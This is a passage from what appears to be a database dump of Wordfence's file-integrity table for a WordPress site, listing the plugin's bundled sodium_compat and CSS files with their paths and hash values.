ypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,0x00000000000000000000000000000000,0x19AD7A84BF711A7398BE713737360BF3,0x43AE44AD619624EAB93D9B665B51A734C24A57D1376C29AE2E0EDE3D25AFFF1B,'',0,'?'),(0xFD8F92100E0B5A4C8B8F4F926CD6E114,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,0x00000000000000000000000000000000,0x900BA64306EDA2951EF046E69668F47A,0x6FC5910A77A66EBECB704C942B3BD0CCEDDF7E8BA87432B405502AC6833616F8,'',0,'?'),(0xB8646023293F9ECFB39ACF30287787F9,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,0x00000000000000000000000000000000,0x20C16F59830BA2DB2DE31729451D4864,0x6CDC2C38BF45F154978E439165796C9E61F95304EED43B29272264CC607AFB99,'',0,'?'),(0x10473C37650B8374AA2FEE928FF757A4,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,0x00000000000000000000000000000000,0x5B6630194C94C59FBBD20DB37B5657E8,0x8B1DD02726DC94155B6D60C4CF8AD0633245BAC7FB25E45715BF4757BAE489B7,'',0,'?'),(0xA0C41D7492CA68BC092C470578A2224D,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,0x00000000000000000000000000000000,0x68C221D8B9DEC399C3C66B3F3DECD388,0x2BCB4D42F68257BBB74580A50E4A310067A67FEA13FBC5105FB99257462C7CAA,'',0,'?'),(0x209F0B470EB6CAB4A9A84774D8919BA4,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,0x00000000000000000000000000000000,0x38804EC39DC5E21AC2C8967611EB93AA,0x192B755214DC410B9665B566E159AD292596083B2A1A8DA17986C9EF55F38A84,'',0,'?'),(0x28B57CFF5AA278B45487FE825B7FC175,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php',1,0x00000000000000000000000000000000,0xD27A3FAEE92817BB8545EE57751F70B9,0xA80F2B8B1D02EB0CEA87151144EF00656AB30D1C171067C6CEE8CFA7B68434F1,'',0,'?'),(0x88A14B6BA966F567FF12E754A4239456,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,0x00000000000000000000000000000000,0x148A65729B02C9788787107C3263BDD3,0x9AF7CB0FD22E43B9BF401C32889D50D663D69C825E6E0A9427122D0587765B7E,'',0,'?'),(0xFCB78F71F3904CF8F33ED4C62351C400,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,0x00000000000000000000000000000000,0x9F7D24109A3FA1E1CCDFD30369FD87C3,0x7184F7956EF62602254789CC137E5C97A65E16BDE9C6D3900C8F9A1397D8309B,'',0,'?'),(0x784C4B7820969632B8AF4973F2212351,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,0x00000000000000000000000000000000,0xCE0D0E9755A18A14F6D602FDDA434222,0x831DFA294DA31506A695ECA982741B55CAE4AFCEB408D5D4AADBF9AFCC462EFC,'',0,'?'),(0xD02523F3BA1FE97415C1CF07F2348478,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,0x00000000000000000000000000000000,0x1B7912A85701FB307B58E56EA75AFF30,0x19C500410256F08C525888CAC895CA7EDC18E164A7135EED2F2985144052F2C6,'',0,'?'),(0x502084F4D24E741244ABDD8C9F6E22B1,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,0x00000000000000000000000000000000,0xB579F1E1EBD14BEC5DF51BA820EDBABE,0x0F18627D2205A96F8D7AD2FD56280D56275175CB49820876B9B910EAF9A1EEEE,'',0,'?'),(0x1B24EE8A50D96089890067EFA85807B2,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,0x00000000000000000000000000000000,0x7946C2935C9C07BBE285DB329ACFFFED,0x326BA173C0DA5C3EAA138552493A6E48F0C8BF1E44136DE0217A7AD80E13B1C0,'',0,'?'),(0x5A3993B6D37D2ED2C24AA4C26B0B3DAA,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,0x00000000000000000000000000000000,0x3849A2E3B61A080503070A0ED9D3A391,0x691B3E7A1292BD0E90529340AF11C5F2E1C2E36BF45790E036759A6BD579880E,'',0,'?'),(0x5006B66277BF3D82CCF594A969EB96D2,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,0x00000000000000000000000000000000,0x5C1AC1C44918057735416C4CDBA2198D,0xFAE3B44B7BFE3808A6C0666C8185371E73855268CEFAEB039EE5978BCA039149,'',0,'?'),(0x111BC42DB2B00727678BAB8D50F75CAC,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,0x00000000000000000000000000000000,0x399E56C6081F23D2B91190EBDB340B80,0x47709A66B81CF848768E869E9F1AE6F3788B388318FEAAA33143B0145BCE3441,'',0,'?'),(0x414B3CACCBD26AA71C90179C677372E3,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,0x00000000000000000000000000000000,0x1534AC954B62281DE55CDEF370B8422D,0x03E79510D5B32A20CAB0090FB6E40286145B717F8AA60CCB9C5088E682F46B81,'',0,'?'),(0xF01920C07FDE8D3C3A39CE137CC2CE36,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,0x00000000000000000000000000000000,0xB2264E7529A97767C6A11C675E26C3CC,0x3521DAECAAEC8594084E7B4763A80219DBFB0BBA79DE5DF2FC3E5C3B184221D9,'',0,'?'),(0x764C4D972E66D5ECD4254F071D7F4D52,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,0x00000000000000000000000000000000,0x00CF4FEB9DFFC7108684EC712B4F1F01,0x359B2786CB12BDD252BF0BFEE7B3D645D2BB3536AFBDC6649A1CEC1FE5C5676F,'',0,'?'),(0x7FFFCD8DDADB199FBD81CF811B628542,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,0x00000000000000000000000000000000,0x0CF5F13AEA435646BC1C91EFD0865213,0x2C29BCF810A77C468F038561B5EAE68283D31F8D669CD93E9CC03B4ACEDF5C1F,'',0,'?'),(0x6F43C922C0CF058551B8EBE07483D179,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,0x00000000000000000000000000000000,0xB108C22B05C1EB021D92FE071706F525,0xC1063421FD8848FC1C3A8D363ECB6C45EEE64563239CD0D8F961057B9D41B47B,'',0,'?'),(0x2AC7C8C61DB2A6BC62C5049F2A6565B8,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,0x00000000000000000000000000000000,0xD012785C387AED4D7FD87E972E04818B,0xFC7652AC008B537E5BFC0D82AAD2AE36DFE16FDDFABE12E192FE3AC59AB50D5D,'',0,'?'),(0x48B7A859366FEFE3447B884C48EA1698,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,0x00000000000000000000000000000000,0x019D567E44B6A919E73BE75B60E9ED64,0xDFBF0A22F8AA4B4CD7C31ABC3627A8838035E306CA63F6A0AA197A9964C0FD77,'',0,'?'),(0xF3F3D2CDD1E29E9EF905AA5ED59852DB,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,0x00000000000000000000000000000000,0xC9DE6F019485E51E97B9E5A76880675B,0x12800BE0C015DF81152ED6112D6834603953205F0DE8932949CD2886ED57D3F2,'',0,'?'),(0xA3141170ABD34099C6CE774E84BA6AAE,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ristretto255.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ristretto255.php',1,0x00000000000000000000000000000000,0xAB55EBAA1DA0739F098515CEDC1F1B95,0x69169B899F6C77CB0A5ECEF7C7457C8722FA20A418DD53FE1C0CE6B2844269E2,'',0,'?'),(0x2524CEEFDD4DBC711806E6543CC4FDF0,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,0x00000000000000000000000000000000,0x43A3BC554F9EF51ADFA0A1787448170C,0x8C470A22875F2F41E76793680911553FE2538273F348F6D7919159A4F4BDD9B3,'',0,'?'),(0x3083B908D6F361CD4FB55A49047C49E9,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',1,0x00000000000000000000000000000000,0xF057160B9748590720F102AEC2B2B789,0x117A1913495D8A5F1D8C0FC7B294A621ECAE1362D188D736FC64EC750F59D933,'',0,'?'),(0xCC997EFCC88CC3AE2B9DE4ED6279C881,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,0x00000000000000000000000000000000,0xF9C784F7FA18E7B095C3DBB9DF330577,0xCAA3123E7971D3A9E4665F17239BBBBC8A86518E9E75C85789220C955E3FA5DB,'',0,'?'),(0x4B30B5F6F20DC5E996DC9063156EE7FB,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,0x00000000000000000000000000000000,0xFE526F700B28EE39BCA530A244897AF7,0x24F224934FE156E8BB66192E69A37BA8F7E5105C83FE4FFE853884887033BDCD,'',0,'?'),(0x3F559EB5F603BDBC9A275F6C2E850F70,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,0x00000000000000000000000000000000,0x6F3E42F79809BF9FBD9113494E942D79,0x0EFEE5686C8E085BC0BBB6BD86A712F1AB28BF016C7E9151F775DF464DB20993,'',0,'?'),(0xF712B6166778834189C8A27DA1670FA2,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,0x00000000000000000000000000000000,0x9904E9BD5D12E18AAEE9C201ECC8A326,0x1C911C16994B94F22302F20C404A55B07D469784181F8EC1C12CFCFEE51D215B,'',0,'?'),(0x0FC15DAF2A0EC12E0F3E6045F59366B1,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,0x00000000000000000000000000000000,0x6BD346A3A0C60C68A2E780810E312DA6,0x361F216F8A6DF6A6DD8E5E8E172EC15E40CBA8D10FD27637F10949E19C7D809F,'',0,'?'),(0xCE6C2F1D3CC0CD55E7EB5A410E078BE5,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,0x00000000000000000000000000000000,0xADAF27E8D088B5486E309DB416EC0D76,0xCE3C69E27F71E1EA871D04C3B3744978C538AA2B954991B5D98D871D573BA527,'',0,'?'),(0x2D5CAC8B5BD716B5B98610E84A92D7A5,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,0x00000000000000000000000000000000,0xD9A1985C7214FEC0E9563B24497374C7,0x8D313CA58FC6C337F40741703408FFE1C197999530568350A1620483BE233B54,'',0,'?'),(0x181DB46F663FDE33A8500BBF31F222E2,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,0x00000000000000000000000000000000,0x670122CCA4112F184F949BEC59A2B727,0xCA38E665EA549B65740D206A189C50F72FA5C04AE41086993C5EBE72D3A57A12,'',0,'?'),(0x9BF3903731D01BACC87D120A01FB14C8,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,0x00000000000000000000000000000000,0x3192322B3B8F46C4EEC5D0BD4E4D8392,0xBE7786C51122B32A94C135A2551220544099E59C6E79C8B3C65E61A575BDB027,'',0,'?'),(0xC7E577AADB79BE2AAE58CD4F0A479BA5,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,0x00000000000000000000000000000000,0xBFB47D18263F50B62144BC2CADFD22DF,0x7D67E1592F7E86BE5B2D9ED49ABCF4648109B10216C870EB6C3966CEACF373DF,'',0,'?'),(0x573868B021C9A96BAEC4890C271D937F,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,0x00000000000000000000000000000000,0x1172A0185255AC62E22ACDD20027B51D,0x78EDEED1F2053C1BD973A392425A9A329C6AA781524D27302524B9DC697B2056,'',0,'?'),(0x08E310CDA51F60464ACD14F65316B175,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,0x00000000000000000000000000000000,0x4B7A2B55EDC1E48F1304C5B828EA355C,0x383ABD916F991D117F49F4392C81EABF3D7A05446B383BD17B417B861A69136A,'',0,'?'),(0x05C4490161BB0E0A0BD88E9A96EAD061,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,0x00000000000000000000000000000000,0xCD01A2810CBE3E1AEBF0B01A2B950F2C,0x2A792498084D515B1571D3023A68E99A0122EEC0F929A358544313000FEB5C6B,'',0,'?'),(0x07F263598446B6EA9EDF7DE56A60BDB6,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,0x00000000000000000000000000000000,0x33828DF191FDEB92620728E6B58FD09A,0x6E3B883C0CD91EB109C795B02D57D5137493F95DCE12C13C91731CB0EAD675A1,'',0,'?'),(0xEF75085F7FF48B8B08FFC2CA7E2100C4,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,0x00000000000000000000000000000000,0x593D0A0B59E0B439399A32AD17F88F11,0xFD97FB36A991B01A2F8888F970E27935EEC19CD245F094D8ADBDA9AD4FB14506,'',0,'?'),(0x076FE6E0F1096C18D108D1B4C6016364,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,0x00000000000000000000000000000000,0xE6D7F80AB0C018A4404C6A87774401EA,0x0DAF380FFA64B3A09F87B2F01CD7381573DA87AACE18EE36A0E8460CFAC88CCF,'',0,'?'),(0xA905EFFA7E2BD8711DEA58BEDB1D2260,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,0x00000000000000000000000000000000,0x7A5A42579EAF6D9142D9CBAFC2E18F15,0xB8C88421AE2B2BE0B6F2CA3885BD2C17760646A1DDFAE2F72B96B904F69E3309,'',0,'?'),(0x18E6D3C4681F5D08878243F980B2412A,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,0x00000000000000000000000000000000,0x2203C8CEB4BF16F14CB2D3EF2EB3C16F,0x1065C1C86FD98ED433C3FBDA75CFA8B0A29A791BE7CBE5D4E23388380AD8913A,'',0,'?'),(0xC55FCC186E80FCA3B3C970B7BC9D6156,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,0x00000000000000000000000000000000,0x3E2A4CD6311ECACBB5A9226B2546832B,0x1B5AB1F669E94DDB66BC558C76B1692DE57D29F406F966D12286FE4D6E643F58,'',0,'?'),(0x8EA2E958701FA4DC10D3E78A7E304418,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,0x00000000000000000000000000000000,0x1ED057AF6F65B17EB0906F42329E5F3B,0x359F71F5AA53724CDF5D8D4F58BDA5981E8B737188CDECF02B0B6C3C91C8C992,'',0,'?'),(0xB5413FE0995D5C38AB504D54C90F6C05,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,0x00000000000000000000000000000000,0x30C7B07B38857D94977AB2036CA9D4FC,0x6A47F0C4C57E2E27A447CCCEEF2AF99727B37F02531033747E99BCE6D386B3B4,'',0,'?'),(0x42E6BA501F891B58A157CCE336E9CB17,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,0x00000000000000000000000000000000,0xF8FA6DF4394E1EA332B5DBC5B35B8A98,0xD81F3D18D1E02A8574FC7A7627DEE70757B5BAF00A18F14B52F96CEBB0E87837,'',0,'?'),(0xA65B27E92FA314D3FE08A23BA0867F94,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,0x00000000000000000000000000000000,0x1117DC862943F42FC186D5AFCB20D99D,0x31C6C2CB2743C54155758A338569A316F666B7669306A6178987EC44746C7ED1,'',0,'?'),(0x1C6194409757725177B6CC5A0A2EEE11,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,0x00000000000000000000000000000000,0x16ADDC917A8C673C4EE8F40A3F6F3666,0x8EC17F190693528DA0B0F44567F8583395864A4163941FEC2161FA5FCAF4537B,'',0,'?'),(0x02CC201F88FBFEC84B2069964493C174,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,0x00000000000000000000000000000000,0xD8CAE603CDC15A7A9A23190748E8E7B2,0x6E5DA8EB7893CB1D1BB6BA9DABA41A5F0ED1AA6BD442B3042D61BD0426BDCC83,'',0,'?'),(0x5790CD4C6A0F4E2FBC40CFA2DFC6B082,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php',1,0x00000000000000000000000000000000,0x54020998C4026E728D6B11169CEF0595,0xE5B33B5C05F8C2581EDA81EEEA192F303BBE9C51F25011862E934234C3F21AD4,'',0,'?'),(0x5F1FCC23E88BF1553170FA4753F2B316,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,0x00000000000000000000000000000000,0x015AB08AC57274BDC2FD77FAC9289865,0xA8D2BF4408DC493CF55EC8691C326457825D4719E25FE42D122B04854138F357,'',0,'?'),(0xAD3F46CFB8BDEB1CBCA54186805231CA,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,0x00000000000000000000000000000000,0x99708B98D48FA66430C4E06C4E26372B,0x5E1F730AF94002472CA41DDA960A3B7C3350096ED4942F0D7A1041DD220A6407,'',0,'?'),(0x822F09C1453A4BF252E5AFA5C076028D,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,0x00000000000000000000000000000000,0x971656C9C35BD753500B6B03168143FB,0xFAFBDABAD985B1C5B4078BBC7D433AE5C3B83D807EE886DE51C0283896D02451,'',0,'?'),(0x967A39BB09C560FC6433DD00C8496179,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,0x00000000000000000000000000000000,0x8AAF6D6791DF517E5B23A35CC51D62B8,0x5082F3FD114DB2B7911954319C15BDD53B88AAB79FBA4218E6B8609DA8BDB91B,'',0,'?'),(0x1E42E30F4081522A0C47997846344E7D,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,0x00000000000000000000000000000000,0xA39E27965FAE3F1453C59F1A5DCD798C,0xA4360E8BD0175B2DF38A852C395952A172DA0D59222DF880616EF3B29136248A,'',0,'?'),(0x89AEBFBC9C9147884714FDA093EC6122,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,0x00000000000000000000000000000000,0xBCFC142A4D5D596E4D04245EC3B922B7,0x1285C0E1CF90CC4E1081D7CB066F854B7451AB56A0ABAB0D33A82DD8F379D92D,'',0,'?'),(0x61BF4A949272D3E4DD26C62D441F10DD,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,0x00000000000000000000000000000000,0x55A6AA6F8DE77D13537D9D0BC196382E,0xEE24AED67303B607D30BF48883ECC83F3B66A2C4A03D600DD909DEC426B9AB21,'',0,'?'),(0xA85858EF8E932ACEE1210832D67E02C5,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,0x00000000000000000000000000000000,0xFA9E2EEDF99BD3BBB531D3412C1D742F,0xBDF67E9B22745CC29B2CFB8534F4BD77A5C2A1AF2D917EAF15874D71A3E4F398,'',0,'?'),(0x71C52427368B6508E2FAB6F72D57115D,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php',1,0x00000000000000000000000000000000,0xD8ABC1E39AE9FBFFB5BEF876A6F7B21E,0x8FCF68BD1480B34703384A3422471860A68713EF9FC7968C0BB6DB4D4482AF7A,'',0,'?'),(0xA3544C20EADF882C5DBDACD5A6866D81,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php','/home/eckank5/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,0x00000000000000000000000000000000,0x389109A481A2BDBB3A7B80E457F3EA65,0x367B77F7BBB50C5E470B6BAECEABC33235DDFA6293F3840DE4DDF193AB84E688,'',0,'?'),(0xD3810271131587918CDCE86EFBB7193A,'wp-content/plugins/wordfence/css/activity-report-widget.1699289814.css','/home/eckank5/public_html/wp-content/plugins/wordfence/css/activity-report-widget.1699289814.css',1,0x00000000000000000000000000000000,0x4A845E07783B7982AD82B0D463A1FDFF,0xD0D3A1AEC166C5614D9A57762BF280A8579F1C257DD6EA9E6044F61F4EA317C5,'',0,'?'),(0x9A9744A4A7B38D27036934D3EAFFAE15,'wp-content/plugins/wordfence/css/diff.1699289814.css','/home/eckank5/public_html/wp-content/plugins/wordfence/css/diff.1699289814.css',1,0x00000000000000000000000000000000,0xDC806709ADFA09992492988B6072F351,0xC0DC161D24B518CC68454A5E35343C249E02D3AD115963C312D7E1C2921BDE26,'',0,'?'),